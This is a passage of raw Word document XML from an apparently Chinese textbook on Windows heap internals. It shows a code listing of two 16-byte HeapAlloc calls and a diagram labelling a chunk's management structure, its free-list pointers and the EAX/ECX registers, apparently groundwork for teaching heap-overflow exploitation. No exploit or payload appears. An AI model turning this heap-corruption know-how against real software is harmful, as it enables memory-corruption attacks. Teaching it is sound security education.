              <v:shape w14:anchorId="61412E6E" id="文本框 2" o:spid="_x0000_s1070" type="#_x0000_t202" style="width:28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1wPEwIAAP8DAAAOAAAAZHJzL2Uyb0RvYy54bWysk9uO2yAQhu8r9R0Q940dN6e1QlbbbFNV&#10;2h6kbR8AYxyjYoYCiZ0+/Q44m422d1V9gcADPzPf/Kxvh06To3RegWF0OskpkUZArcye0Z8/du9W&#10;lPjATc01GMnoSXp6u3n7Zt3bUhbQgq6lIyhifNlbRtsQbJllXrSy434CVhoMNuA6HnDp9lnteI/q&#10;nc6KPF9kPbjaOhDSe/x7PwbpJuk3jRThW9N4GYhmFHMLaXRprOKYbda83DtuWyXOafB/yKLjyuCl&#10;F6l7Hjg5OPWXVKeEAw9NmAjoMmgaJWSqAauZ5q+qeWy5lakWhOPtBZP/f7Li6/HRfnckDB9gwAam&#10;Irx9APHLEwPblpu9vHMO+lbyGi+eRmRZb315PhpR+9JHkar/AjU2mR8CJKGhcV2kgnUSVMcGnC7Q&#10;5RCIwJ/vF8tiNcOQwNh0ls8WRWpLxsvn49b58ElCR+KEUYddTfL8+OBDTIeXz1vibR60qndK67Rw&#10;+2qrHTlydMAufamCV9u0IT2jN/NinpQNxPPJHJ0K6FCtOkZXefxGz0QcH02dtgSu9DjHTLQ584lI&#10;RjhhqAaiakaLZTwceVVQn5CYg9GR+IJw0oL7Q0mPbmTU/z5wJynRnw1Sv5nOIqKQFrP5EhERdx2p&#10;riPcCJRiNFAyTrchWT7xsHfYnZ1K3F4yOeeMLks4zy8i2vh6nXa9vNvNEwAAAP//AwBQSwMEFAAG&#10;AAgAAAAhAO7/UkfbAAAABQEAAA8AAABkcnMvZG93bnJldi54bWxMj7FOw0AQRHsk/uG0SHTkbIuE&#10;yPgcISQalIIkFJQbe/EZ+/aM75yYv2ehgWak1axm3hSb2fXqRGNoPRtIFwko4srXLTcGXg9PN2tQ&#10;ISLX2HsmA18UYFNeXhSY1/7MOzrtY6MkhEOOBmyMQ651qCw5DAs/EIv37keHUc6x0fWIZwl3vc6S&#10;ZKUdtiwNFgd6tFR1+8lJyTZU085/fqTbTr/ZboXLF/tszPXV/HAPKtIc/57hB1/QoRSmo5+4Dqo3&#10;IEPir4q3vFvfgjoayLI0A10W+j99+Q0AAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAA&#10;EwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/&#10;1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDzB1wP&#10;EwIAAP8DAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDu&#10;/1JH2wAAAAUBAAAPAAAAAAAAAAAAAAAAAG0EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADz&#10;AAAAdQUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="2E0DB933" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>代码</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>2</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>.5</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5F86A940" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="005C5762" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLine="420"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="005C5762">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>buf1 =(char*)HeapAlloc(hHeap, 0, 16);</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4C17F748" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="005C5762" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                      <w:pPr>
                        <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
                        <w:ind w:firstLine="420"/>
                        <w:jc w:val="left"/>
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="005C5762">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                          <w:szCs w:val="21"/>
                        </w:rPr>
                        <w:t>buf2 =(char*)HeapAlloc(hHeap, 0, 16);</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5856F2B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第一次申请堆内存，执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>buf1 =(char*)HeapAlloc(hHeap, 0, 16);</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统返回buf</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的可用空间，此时的堆结构如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.17</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA978AC"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mc:AlternateContent>
          <mc:Choice Requires="wpc">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F7A27C8" wp14:editId="2C54E1A0">
                <wp:extent cx="5634990" cy="1524332"/>
                <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                <wp:docPr id="234" name="画布 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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="161339" y="36775"/>
                            <a:ext cx="556260" cy="305435"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2F9CDD7F"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Ansi="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>字节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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2803768" y="36137"/>
                            <a:ext cx="556260" cy="304800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="45A208F1"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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4408634" y="36794"/>
                            <a:ext cx="556260" cy="304165"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="02F524EC"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矩形 78"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="57" y="292145"/>
                            <a:ext cx="1367777"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56C7954" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                                </w:rPr>
                                <w:t>Buf1</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>管理结构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1074618" y="292200"/>
                            <a:ext cx="1567811"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A976D4A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>B</w:t>
                              </w:r>
                              <w:r>
                                <w:t>uf1</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>的可操作空间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2458982" y="292835"/>
                            <a:ext cx="1575576" cy="342265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="7E0C6491" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>下一空闲堆管理结构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文本框 81"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1283132" y="1098643"/>
                            <a:ext cx="1713865" cy="387985"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="58F953D8" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>系统返回的Buf</w:t>
                              </w:r>
                              <w:r>
                                <w:t>1</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>可用空间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连接符: 肘形 82"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="1074569" y="635045"/>
                            <a:ext cx="208504" cy="6578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连接符: 肘形 83"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="3960582" y="635046"/>
                            <a:ext cx="276468" cy="53743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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4237245" y="959755"/>
                            <a:ext cx="463550" cy="425450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="0EC1EA23" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                                </w:rPr>
                                <w:t>EAX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连接符: 肘形 85"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000">
                            <a:off x="4748265" y="635101"/>
                            <a:ext cx="292815" cy="67650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矩形 86"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3960764" y="292835"/>
                            <a:ext cx="1575435" cy="342265"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="72BB341F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>两个双链表的指针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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5041311" y="1098882"/>
                            <a:ext cx="456565" cy="425450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="2503B060" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>ECX</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7A27C8" id="画布 234" o:spid="_x0000_s1071" editas="canvas" style="width:443.7pt;height:120.05pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="56349,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&#10;AAAEAAQA8wAAAAwJAAAAAA==&#10;">
                <v:shape id="_x0000_s1072" type="#_x0000_t75" style="position:absolute;width:56349;height:15240;visibility:visible;mso-wrap-style:square">
                  <v:fill o:detectmouseclick="t"/>
                  <v:path o:connecttype="none"/>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1073" type="#_x0000_t202" style="position:absolute;left:1613;top:367;width:5562;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14:paraId="2F9CDD7F"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Ansi="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>字节</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1074" type="#_x0000_t202" style="position:absolute;left:28037;top:361;width:5563;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2xAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdaPS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B+yz/bEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="45A208F1"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v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1075" type="#_x0000_t202" style="position:absolute;left:44086;top:367;width:5562;height:3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GBxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdaOCjdFVRBBysAfTitdH9pkEs2/T3a3Gf+8WhB6HmfmGWW1604obOd9YVjAZJyCI&#10;S6sbrhR8f+3fUxA+IGtsLZOCB3nYrAdvK8y0vfORbkWoRISwz1BBHUKXSenLmgz6se2Io3exzmCI&#10;0lVSO7xHuGnlNEnm0mDDcaHGjnY1ldfi1yj43C2KNJ8+3Hkxy/dF+jOxh/Sk1GjYb5cgAvXhP/xq&#10;51rBxxz+vsQfINdPAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAO9gUYHEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="02F524EC"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v:textbox>
                </v:shape>
                <v:rect id="矩形 78" o:spid="_x0000_s1076" style="position:absolute;top:2921;width:136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14:paraId="456C7954" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t>Buf1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>管理结构</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 79" o:spid="_x0000_s1077" style="position:absolute;left:10746;top:2922;width:156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1A976D4A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>B</w:t>
                        </w:r>
                        <w:r>
                          <w:t>uf1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>的可操作空间</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 80" o:spid="_x0000_s1078" style="position:absolute;left:24589;top:2928;width:1575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ZbwQAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LasJA&#10;FN0X+g/DLbhrJu3C2phRRCwUFIPWhctL5pqEZu6EmWkef+8sCi4P552vR9OKnpxvLCt4S1IQxKXV&#10;DVcKLj9frwsQPiBrbC2Tgok8rFfPTzlm2g58ov4cKhFD2GeooA6hy6T0ZU0GfWI74sjdrDMYInSV&#10;1A6HGG5a+Z6mc2mw4dhQY0fbmsrf859RYItmajfu89gf6OO6L0I6jPOdUrOXcbMEEWgMD/G/+1sr&#10;WMT18Uv8AXJ1BwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJe4plvBAAAA2wAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="7E0C6491" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>下一空闲堆管理结构</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
